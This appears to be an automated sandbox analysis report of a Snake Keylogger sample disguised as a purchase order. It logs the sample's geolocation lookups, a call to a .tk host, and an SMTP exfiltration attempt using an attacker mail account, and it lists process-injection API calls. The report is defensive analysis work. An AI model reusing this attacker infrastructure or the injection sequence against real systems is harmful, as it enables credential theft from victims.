                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449745172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:03 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:21:03 UTC708INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:03 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37044
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuTKLCqXX1y1BvV6Xv0dDYe3xz8PXyuc%2FLBHhqCa3jewwqUiVeA3XVndXzLp50KVbcV2CraQNY8RvlZbvoMDCwQ7cOWebbumsrPEKqsZnU0O7wmvLL%2BR1%2FYBmRs0%2BtKiQy2ERJ0y"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccaf75bee67b7-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:03 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449747172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:04 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:21:05 UTC710INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:04 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37045
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZYelCumYmDV%2BxH%2Bu62wWH0gvIBi47liTi0ZsBwk3sR1Dct%2B%2FfD8N89XVFykzFtvBahgxncceNjH8Rvzj0tcqlsELKtZa2zjzKgp%2BDmx8oIZr8UmqYhRPcSsNIluFs1RdZvyDR24"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccafdf8b15c76-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:05 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.449749172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:05 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-04-03 23:21:06 UTC704INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:06 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37047
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6UCYN2Mfuglgi6kPEH1jYvM7qaTdCBbJB0%2BM1ia6LCJ3T0S%2Ft7ulCrZzL0w2vo8Ox4kkyf2jQN94rzoDoKNXsBa4OCWTmM6TNkMJvKnHeHTRkKWDp0rpJaw0QiDiNLfFGFHMj3E"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccb048e0fb3dd-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:06 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.449750104.21.27.854437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:08 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                                                      Host: scratchdreams.tk
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:21:39 UTC731INHTTP/1.1 522
                                                                                      Date: Wed, 03 Apr 2024 23:21:39 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 15
                                                                                      Connection: close
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi1FOMgdftNkSzsqtxP%2F865Y3YwyqVPIjkCqAvQVqFn3OZZVkFvzIZSX2vup3jUWNH6JvmWJeR4sZR5n4VpnNkiDof4M54LQTJKU3tKyQo8LwNf34b7qIzvFDp1EaYcMAuKv"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Referrer-Policy: same-origin
                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccb126a3102e0-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:39 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                      Data Ascii: error code: 522


                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Apr 4, 2024 01:21:45.017853975 CEST58749757208.91.199.225192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 4, 2024 01:21:45.018009901 CEST49757587192.168.2.4208.91.199.225EHLO 210979
                                                                                      Apr 4, 2024 01:21:45.213936090 CEST58749757208.91.199.225192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 4, 2024 01:21:45.214875937 CEST49757587192.168.2.4208.91.199.225AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
                                                                                      Apr 4, 2024 01:21:45.414038897 CEST58749757208.91.199.225192.168.2.4334 UGFzc3dvcmQ6
                                                                                      Apr 4, 2024 01:21:45.617820978 CEST58749757208.91.199.225192.168.2.4235 2.7.0 Authentication successful
                                                                                      Apr 4, 2024 01:21:45.618011951 CEST49757587192.168.2.4208.91.199.225MAIL FROM:<tslogs@mksiimst.com>
                                                                                      Apr 4, 2024 01:21:45.816104889 CEST58749757208.91.199.225192.168.2.4250 2.1.0 Ok
                                                                                      Apr 4, 2024 01:21:45.816266060 CEST49757587192.168.2.4208.91.199.225RCPT TO:<tslogs@mksiimst.com>
                                                                                      Apr 4, 2024 01:21:46.029256105 CEST58749757208.91.199.225192.168.2.4550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:01:20:50
                                                                                      Start date:04/04/2024
                                                                                      Path:C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\109__Purchase_Order.exe"
                                                                                      Imagebase:0xdc0000
                                                                                      File size:518'656 bytes
                                                                                      MD5 hash:4A14A9DEDD4DFE259949539090CCC9FE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:01:20:56
                                                                                      Start date:04/04/2024
                                                                                      Path:C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\109__Purchase_Order.exe"
                                                                                      Imagebase:0xda0000
                                                                                      File size:518'656 bytes
                                                                                      MD5 hash:4A14A9DEDD4DFE259949539090CCC9FE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:217
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 30960 2ff095f 30961 2ff05f4 30960->30961 30961->30960 30962 2ff07ba 30961->30962 30966 2ff0fc1 30961->30966 30981 2ff1020 30961->30981 30996 2ff0fd0 30961->30996 30967 2ff0fd0 30966->30967 30976 2ff100e 30967->30976 31011 2ff16e8 30967->31011 31016 2ff15ca 30967->31016 31021 2ff1a4a 30967->31021 31026 2ff15aa 30967->31026 31031 2ff1bee 30967->31031 31036 2ff152f 30967->31036 31040 2ff1c72 30967->31040 31045 2ff1a33 30967->31045 31050 2ff1496 30967->31050 31054 2ff1622 30967->31054 31059 2ff1642 30967->31059 31063 2ff1447 30967->31063 30976->30962 30982 2ff0fbc 30981->30982 30983 2ff100e 30982->30983 30984 2ff1496 2 API calls 30982->30984 30985 2ff1a33 2 API calls 30982->30985 30986 2ff1c72 2 API calls 30982->30986 30987 2ff152f 2 API calls 30982->30987 30988 2ff1bee 2 API calls 30982->30988 30989 2ff15aa 2 API calls 30982->30989 30990 2ff1a4a 2 API calls 30982->30990 30991 2ff15ca 2 API calls 30982->30991 30992 2ff16e8 2 API calls 30982->30992 30993 2ff1447 2 API calls 30982->30993 30994 2ff1642 2 API calls 30982->30994 30995 2ff1622 2 API calls 30982->30995 30983->30962 30984->30983 30985->30983 30986->30983 30987->30983 30988->30983 30989->30983 30990->30983 30991->30983 30992->30983 30993->30983 30994->30983 30995->30983 30997 2ff0fea 30996->30997 30998 2ff1496 2 API calls 30997->30998 30999 2ff1a33 2 API calls 30997->30999 31000 2ff1c72 2 API calls 30997->31000 31001 2ff152f 2 API calls 30997->31001 31002 2ff1bee 2 API calls 30997->31002 31003 2ff15aa 2 API calls 30997->31003 31004 2ff1a4a 2 API calls 30997->31004 31005 2ff15ca 2 API calls 30997->31005 31006 2ff100e 30997->31006 31007 2ff16e8 2 API calls 30997->31007 31008 2ff1447 2 API calls 30997->31008 31009 2ff1642 2 API calls 30997->31009 31010 2ff1622 2 API calls 30997->31010 30998->31006 30999->31006 31000->31006 31001->31006 31002->31006 31003->31006 31004->31006 31005->31006 31006->30962 31007->31006 31008->31006 31009->31006 31010->31006 31012 2ff16f5 31011->31012 31067 2f7feb0 31012->31067 31071 2f7feaf 31012->31071 31013 2ff15c6 31013->30976 31017 2ff15ee 31016->31017 31075 5baf4c8 31017->31075 31079 5baf4d0 31017->31079 31018 2ff1603 31018->30976 31022 2ff1a50 31021->31022 31083 2ff0007 31022->31083 31087 2ff0040 31022->31087 31023 2ff1a73 31027 2ff191c 31026->31027 31091 5baf57b 31027->31091 31095 5baf580 31027->31095 31028 2ff1937 31032 2ff1b9d 31031->31032 31033 2ff1bb4 31031->31033 31032->31033 31099 5bafec8 31032->31099 31103 5bafec1 31032->31103 31038 5baf57b Wow64SetThreadContext 31036->31038 31039 5baf580 Wow64SetThreadContext 31036->31039 31037 2ff1549 31037->30976 31038->31037 31039->31037 31041 2ff1c78 31040->31041 31043 2f7feb0 WriteProcessMemory 31041->31043 31044 2f7feaf WriteProcessMemory 31041->31044 31042 2ff1dee 31043->31042 31044->31042 31046 2ff1b96 31045->31046 31048 5bafec8 VirtualAllocEx 31046->31048 31049 5bafec1 VirtualAllocEx 31046->31049 31047 2ff1bb4 31048->31047 31049->31047 31051 2ff149f 31050->31051 31051->31050 31052 2f7feb0 WriteProcessMemory 31051->31052 31053 2f7feaf WriteProcessMemory 31051->31053 31052->31051 31053->31051 31055 2ff15d7 31054->31055 31057 5baf4c8 ResumeThread 31055->31057 31058 5baf4d0 ResumeThread 31055->31058 31056 2ff1603 31056->30976 31057->31056 31058->31056 31060 2ff1496 31059->31060 31060->31059 31061 2f7feb0 WriteProcessMemory 31060->31061 31062 2f7feaf WriteProcessMemory 31060->31062 31061->31060 31062->31060 31107 2ff01cd 31063->31107 31111 2ff01d8 31063->31111 31068 2f7fef8 WriteProcessMemory 31067->31068 31070 2f7ff4f 31068->31070 31070->31013 31072 2f7feb0 WriteProcessMemory 31071->31072 31074 2f7ff4f 31072->31074 31074->31013 31076 5baf4d0 ResumeThread 31075->31076 31078 5baf541 31076->31078 31078->31018 31080 5baf510 ResumeThread 31079->31080 31082 5baf541 31080->31082 31082->31018 31084 2ff008b ReadProcessMemory 31083->31084 31086 2ff00cf 31084->31086 31086->31023 31088 2ff008b ReadProcessMemory 31087->31088 31090 2ff00cf 31088->31090 31090->31023 31092 5baf5c5 Wow64SetThreadContext 31091->31092 31094 5baf60d 31092->31094 31094->31028 31096 5baf5c5 Wow64SetThreadContext 31095->31096 31098 5baf60d 31096->31098 31098->31028 31100 5baff08 VirtualAllocEx 31099->31100 31102 5baff45 31100->31102 31102->31033 31104 5bafec8 VirtualAllocEx 31103->31104 31106 5baff45 31104->31106 31106->31033 31108 2ff01d8 CreateProcessA 31107->31108 31110 2ff0423 31108->31110 31112 2ff0261 CreateProcessA 31111->31112 31114 2ff0423 31112->31114 30843 2f74668 30844 2f7467a 30843->30844 30845 2f74686 30844->30845 30849 2f74788 30844->30849 30854 2f73e1c 30845->30854 30847 2f746a5 30850 2f747ad 30849->30850 30858 2f74898 30850->30858 30862 2f74888 30850->30862 30855 2f73e27 30854->30855 30870 2f75c2c 30855->30870 30857 2f77000 30857->30847 30860 2f748bf 30858->30860 30859 2f7499c 30859->30859 30860->30859 30866 2f7449c 30860->30866 30864 2f748bf 30862->30864 30863 2f7499c 30864->30863 30865 2f7449c CreateActCtxA 30864->30865 30865->30863 30867 2f75928 CreateActCtxA 30866->30867 30869 2f759eb 30867->30869 30871 2f75c37 30870->30871 30874 2f75c4c 30871->30874 30873 2f770a5 30873->30857 30875 2f75c57 30874->30875 30878 2f75c7c 30875->30878 30877 2f77182 30877->30873 30879 2f75c87 30878->30879 30882 2f75cac 30879->30882 30881 2f77285 30881->30877 30883 2f75cb7 30882->30883 30885 2f78673 30883->30885 30888 2f7ad20 30883->30888 30884 2f786b1 30884->30881 30885->30884 30892 2f7ce10 30885->30892 30897 2f7ad47 30888->30897 30902 2f7ad58 30888->30902 30889 2f7ad36 30889->30885 30893 2f7ce31 30892->30893 30896 2f7ce55 30893->30896 30934 2f7cfc0 30893->30934 30938 2f7cfaf 30893->30938 30896->30884 30898 2f7ad58 30897->30898 30906 2f7ae41 30898->30906 30914 2f7ae50 30898->30914 30899 2f7ad67 30899->30889 30904 2f7ae41 2 API calls 30902->30904 30905 2f7ae50 2 API calls 30902->30905 30903 2f7ad67 30903->30889 30904->30903 30905->30903 30907 2f7ae61 30906->30907 30908 2f7ae84 30906->30908 30907->30908 30922 2f7b0d9 30907->30922 30926 2f7b0e8 30907->30926 30908->30899 30909 2f7ae7c 30909->30908 30910 2f7b088 GetModuleHandleW 30909->30910 30911 2f7b0b5 30910->30911 30911->30899 30915 2f7ae61 30914->30915 30917 2f7ae84 30914->30917 30915->30917 30920 2f7b0d9 LoadLibraryExW 30915->30920 30921 2f7b0e8 LoadLibraryExW 30915->30921 30916 2f7ae7c 30916->30917 30918 2f7b088 GetModuleHandleW 30916->30918 30917->30899 30919 2f7b0b5 30918->30919 30919->30899 30920->30916 30921->30916 30923 2f7b0fc 30922->30923 30924 2f7b121 30923->30924 30930 2f7a890 30923->30930 30924->30909 30927 2f7b0fc 30926->30927 30928 2f7a890 LoadLibraryExW 30927->30928 30929 2f7b121 30927->30929 30928->30929 30929->30909 30932 2f7b2c8 LoadLibraryExW 30930->30932 30933 2f7b341 30932->30933 30933->30924 30935 2f7cfcd 30934->30935 30936 2f7d007 30935->30936 30942 2f7c8f8 30935->30942 30936->30896 30939 2f7cfcd 30938->30939 30940 2f7d007 30939->30940 30941 2f7c8f8 3 API calls 30939->30941 30940->30896 30941->30940 30943 2f7c903 30942->30943 30945 2f7d918 30943->30945 30946 2f7ca24 30943->30946 30945->30945 30947 2f7ca2f 30946->30947 30948 2f75cac 3 API calls 30947->30948 30949 2f7d987 30948->30949 30949->30945 30950 2ff2160 30951 2ff22eb 30950->30951 30952 2ff2186 30950->30952 30952->30951 30955 2ff23d9 30952->30955 30958 2ff23e0 PostMessageW 30952->30958 30956 2ff23e0 PostMessageW 30955->30956 30957 2ff244c 30956->30957 30957->30952 30959 2ff244c 30958->30959 30959->30952 31115 2f7d0d8 31116 2f7d11e 31115->31116 31120 2f7d2a7 31116->31120 31124 2f7d2b8 31116->31124 31117 2f7d20b 31121 2f7d2b5 31120->31121 31122 2f7d2e6 31121->31122 31127 2f7c9c0 31121->31127 31122->31117 31125 2f7c9c0 DuplicateHandle 31124->31125 31126 2f7d2e6 31125->31126 31126->31117 31128 2f7d320 DuplicateHandle 31127->31128 31129 2f7d3b6 31128->31129 31129->31122
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44cae1a7327f417ed029e46fc19b802dc280a6f13869ad12ad141f88dea5ca60
                                                                                        • Instruction ID: 8f781ab946081dc9f963d7e63466601d3925103bdbfa118ab5da6ddfda7bc4df
                                                                                        • Opcode Fuzzy Hash: 44cae1a7327f417ed029e46fc19b802dc280a6f13869ad12ad141f88dea5ca60
                                                                                        • Instruction Fuzzy Hash: 10D1BC72B006848FEB65EF75C850B6EB7E7AF88780F1044AAD346DB2A0DB35D901CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b19e3afc3d7d0cc28198c0a70390f0f99942da28c24c9d8efce1194a60efe81
                                                                                        • Instruction ID: 804931e952faea3327a148bfbc8948bfa3e5e3af032196bfed7500ca45e38958
                                                                                        • Opcode Fuzzy Hash: 2b19e3afc3d7d0cc28198c0a70390f0f99942da28c24c9d8efce1194a60efe81
                                                                                        • Instruction Fuzzy Hash: 6161C7B5E051199FDB04DFAAD5809AEFBF2FF88300F28D169D419A7355D730A942CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 015ac923f4b598f5c593d0737eeba6cb6be48e632b9f71090b792570f22c88bf
                                                                                        • Instruction ID: e230f666c51d0eda68b5d8ce507c90dc8cb0eda0fca341046a88b5ee209dd018
                                                                                        • Opcode Fuzzy Hash: 015ac923f4b598f5c593d0737eeba6cb6be48e632b9f71090b792570f22c88bf
                                                                                        • Instruction Fuzzy Hash: 79413C75E052198FDB05CFAAC94059EFBF2FF88300F18C16AD418AB355DB30A946CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 387 2ff01cd-2ff026d 390 2ff026f-2ff0279 387->390 391 2ff02a6-2ff02c6 387->391 390->391 392 2ff027b-2ff027d 390->392 396 2ff02ff-2ff032e 391->396 397 2ff02c8-2ff02d2 391->397 394 2ff027f-2ff0289 392->394 395 2ff02a0-2ff02a3 392->395 398 2ff028d-2ff029c 394->398 399 2ff028b 394->399 395->391 407 2ff0367-2ff0421 CreateProcessA 396->407 408 2ff0330-2ff033a 396->408 397->396 400 2ff02d4-2ff02d6 397->400 398->398 401 2ff029e 398->401 399->398 402 2ff02f9-2ff02fc 400->402 403 2ff02d8-2ff02e2 400->403 401->395 402->396 405 2ff02e6-2ff02f5 403->405 406 2ff02e4 403->406 405->405 409 2ff02f7 405->409 406->405 419 2ff042a-2ff04b0 407->419 420 2ff0423-2ff0429 407->420 408->407 410 2ff033c-2ff033e 408->410 409->402 412 2ff0361-2ff0364 410->412 413 2ff0340-2ff034a 410->413 412->407 414 2ff034e-2ff035d 413->414 415 2ff034c 413->415 414->414 416 2ff035f 414->416 415->414 416->412 430 2ff04b2-2ff04b6 419->430 431 2ff04c0-2ff04c4 419->431 420->419 430->431 434 2ff04b8 430->434 432 2ff04c6-2ff04ca 431->432 433 2ff04d4-2ff04d8 431->433 432->433 435 2ff04cc 432->435 436 2ff04da-2ff04de 433->436 437 2ff04e8-2ff04ec 433->437 434->431 435->433 436->437 438 2ff04e0 436->438 439 2ff04fe-2ff0505 437->439 440 2ff04ee-2ff04f4 437->440 438->437 441 2ff051c 439->441 442 2ff0507-2ff0516 439->442 440->439 443 2ff051d 441->443 442->441 443->443
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02FF040E
